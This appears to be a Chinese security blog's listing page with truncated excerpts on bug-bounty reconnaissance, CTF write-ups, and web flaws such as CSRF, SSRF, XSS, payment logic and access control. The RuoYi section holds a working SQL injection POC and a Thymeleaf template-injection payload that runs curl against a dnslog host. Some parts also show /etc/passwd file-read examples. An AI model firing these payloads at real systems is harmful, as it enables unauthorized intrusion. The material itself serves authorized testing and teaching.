信息收集
找准SRC,就是淦。企业SRC千千万,就是淦!
工具
SRC信息收集
小程序信息收集
子域名信息收集
子公司信息收集
ICP备案
ICON 信息收集
项目信息收集
IP信息收集
SRC信息收集SRC大全http://www.aquanbang.com/favorites/企业src/https://mp.weixin.qq.com/s/eau4-C8MFrbTN4z_Sm5AoAhttps://mp.weixin.qq.com/s/a5jh08vFG6BZzxIvYigmMwhttps://www.anquanke.com/post/id/84608
选择SRC大型企业SRC举例:
https://sfsrc.sf-express.com/notice/SFSA23-58/1695546355530
优点资产丰厚,核心业务,一般业务,边缘业务
业内认可度高,大型SRC
钱多,审核标准固定
缺点难度大,特别是主站,工程师代码优秀
中小型企业SRC优点难度适宜 挖的人并不多
缺点资产较少
评判标准不一(某些洞 前期是认的 但是到了后面感觉)
审核较慢
公益SRC360公 ...
数据分析packet
题目内容:
wireshark在手,简单的数据包分析就是小case。
查看tcp流19
一段base64,解码后得到
flag{7d6f17a4-2b0a-467d-8a42-66750368c249}
缺失的数据
题目内容:随着数字技术的迅猛发展,图像在网络上的传播日益广泛。然而,这也带来了版权保护、信息认证和内容完整性验证等一系列问题。数字水印技术作为一种有效的信息隐藏和认证手段,请分析出图片中隐藏的信息。
orign.zip里面有个srcret.txt,这个是个字典
用arch爆破一下
密码为pavilion
解压出来
得到原先文件a.png
原先有个lose.py
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677 class WaterMarkDWT: def __init__(self, origin ...
若依框架页面展示
若依系统前后台漏洞大全
Shiro反序列化
SQL注入(需要登录)漏洞点为系统管理中的角色管理的搜索功能,发现注入点参数为:params[dataScope]
1234POC:pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=andextractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))
Thymeleaf模板注入(需要登录)给payload编码一下,选URL编码:
1${T (java.lang.Runtime).getRuntime().exec("curl xxxx.dnslog.cn")}
登录系统,需要添加cookie访问
1http://192.168.0.2/ ...
CSRFCSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。
最简单的方法就是抓取一个正常请求的数据包,如果没有Referer字段和token,那么极有可能存在CSRF漏洞。
靶场练习https://portswigger.net/web-security/csrf
实战案例首先我们可以操作的功能有创建项目,发布项目,发布项目后会在公开的项目里面展示。保存项目是数据包是以下这样子的,如何来测试csrf漏洞呢?
我关注的点是在thumbnailUrl参数,这个参数是控制我们项目的图片的,如果我们把项目公开,是不是图片也能展示在公共区域。那么怎么造成危害呢?
在退出这个功能点找到了csrf,只要访问https://xxx.com/users/sign_out用户就会退出。那么我们将图片的地址改成退 ...
数据分析不安全的U盘.1
题目内容:
小明在一家数据安全公司上班,今天在公司捡到了一个U盘,好奇心冒出的他将它插入到自己的电脑中,并查看里面的README.pdf后,打开后发现自己的电脑变卡了,并且一段时间后,有很大的下载的流量传入。小明在想,难道这个pdf文件是木马?于是有着安全意识的小明,紧急将当前电脑的内存状态给进行了一个保存,并进行了断网操作。
(本题附件见于提前下载的加密压缩包file1.7z,解压密码为03feb52b45d074a82c064ee0f73f089e)
请提交小明电脑中的test账户的密码(格式为hash对应的明文,长度为9)
12345volatility_2.6_win64_standalone.exe -f "D:\UserData\Desktop\春秋杯\不安全的U盘_3ba0c570fac7eef3e90acc3eaabb5c8d\WIN-T89OD3C9LOC-20231229-081734.raw" --profile=Win7SP1x64 hashdumpVolatility Foundation Volatility ...
SSRF服务器请求伪造什么是ssrf简介SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统,因为服务器请求天然的可以穿越防火墙。漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作正确的过滤和限制。
Ssrf参数以下是一些常见的SSRF漏洞参数:
url:通常用于指定需要访问的目标URL。https://baidu.com/?url=http://asd.comfile:用于指定需要读取的文件路径。https://baidu.com/?file=/etc/passwordport:用于指定需要连接的目标端口号。addr:用于指定需要访问的IP地址。redirect:用于指定需要重定向到的URL地址。ping:用于执行网络探测操作。path:用于指定需要访问的系统文件路径。ips:用于指定需要访问的多个IP地址。host:用于指定需要访问的主机名。proxy:用于指定代理服务器的地址和端口号。
请注意,这只 ...
支付漏洞0x01 修改支付价格在支付当中,购买商品一般分为三步骤:订购、确认信息、付款。
那么这个修改价格具体是修改哪一步时的价格呢?在我看来,你可以在这三个步骤当中的随便一个步骤进行修改价格测试,如果前面两步有验证机制,那么你可在最后一步付款时进行抓包尝试修改金额,如果没有在最后一步做好检验,那么问题就会存在,其修改的金额值你可以尝试小数目或者尝试负数。
这里我找到了相关例子: 总价=(单价*数量-优惠券)*折扣+积分+运费
https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0211806https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0203791https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0174347http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2016-0226613
0x02 修改支付状态这个问题我隐约的遇到过,之前在找 ...
什么是未授权简介未授权字面上理解是未获得授权,对于正常的业务来说,有些功能点需要经过登录之后才能进行,那么如果我们通过一些绕过,无需登录也可以完成此类操作,那么便是未授权访问漏洞了。
常见的未授权Nday未授权
https://zhuanlan.zhihu.com/p/544862021
12345678910111213141516171819202122232425262728Active MQ 未授权访问Atlassian Crowd 未授权访问CouchDB 未授权访问Docker 未授权访问Dubbo 未授权访问Druid 未授权访问Elasticsearch 未授权访问FTP 未授权访问Hadoop 未授权访问JBoss 未授权访问Jenkins 未授权访问Jupyter Notebook 未授权访问Kibana 未授权访问Kubernetes Api Server 未授权访问LDAP 未授权访问MongoDB 未授权访问Memcached 未授权访问NFS 未授权访问Rsync 未授权访问Redis 未授权访问RabbitMQ 未授权访问Solr 未授权访问Spring ...
CROS跨域资源共享什么是corsa页面想获取b页面资源,如果a、b页面的协议、域名、端口、子域名不同,所进行的访问行动都是跨域的,而浏览器为了安全问题一般都限制了跨域访问,也就是不允许跨域请求资源。注意:跨域限制访问,其实是浏览器的限制。理解这一点很重要!!!比如你发送一个登录请求,是一个非简单请求,浏览器回先发送一个OPTIONS请求,如果服务器端不允许跨域,请求就会直接结束,后续的登录请求就不会发送。
如何测试Burp靶场:https://portswigger.net/web-security/cors
https://blog.csdn.net/m0_63303407/article/details/128618280
XSS跨站脚本漏洞什么是xss漏洞XSS攻击通常指黑客通过“HTML注入”篡改网页,插入恶意脚本,从而使用户浏览网页时控制用户浏览器的一种攻击。
如何测试黑盒测试
尽可能找到一切用户可控并且能够输出在页面代码中的地方,比如下面这些:
URL的每一个参数
URL本身
表单
搜索框
常见业务场景
重灾区:评论区、留言区、个人信息、订单信息等
针对型:站内 ...
什么是越权越权漏洞是Web应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。而且属于逻辑漏洞的一种,防护和检测都不好做。
水平越权假设用户A和用户B属于拥有相同的权限等级,他们能获取自己的个人数据,但如果系统只验证了能访问数据的角色,而没有对数据做细分或者校验,导致用户A能访问到用户B的数据,那么用户A 访问用户B的这种行为就叫做水平越权访问。
如何测试最重要的是要找有id控制的功能点!!!!比如说购物网站①收货地址(增加、修改、删除)②发票地址(增加、修改、删除)③优惠券(使用优惠券的时候能否修改使用其他账号的优惠券)④提交订单(使用其他用户的地址)⑤订单号(查看别人订单信息)⑥评价商品(删除评价)购物网站商家后台
get数据包http://xxx.xxx/x/user?id=123http://xxx.xxx/x/user/userid/123http://xxx.xxx/x/user/userid/users/1b04c196http://xxx.x ...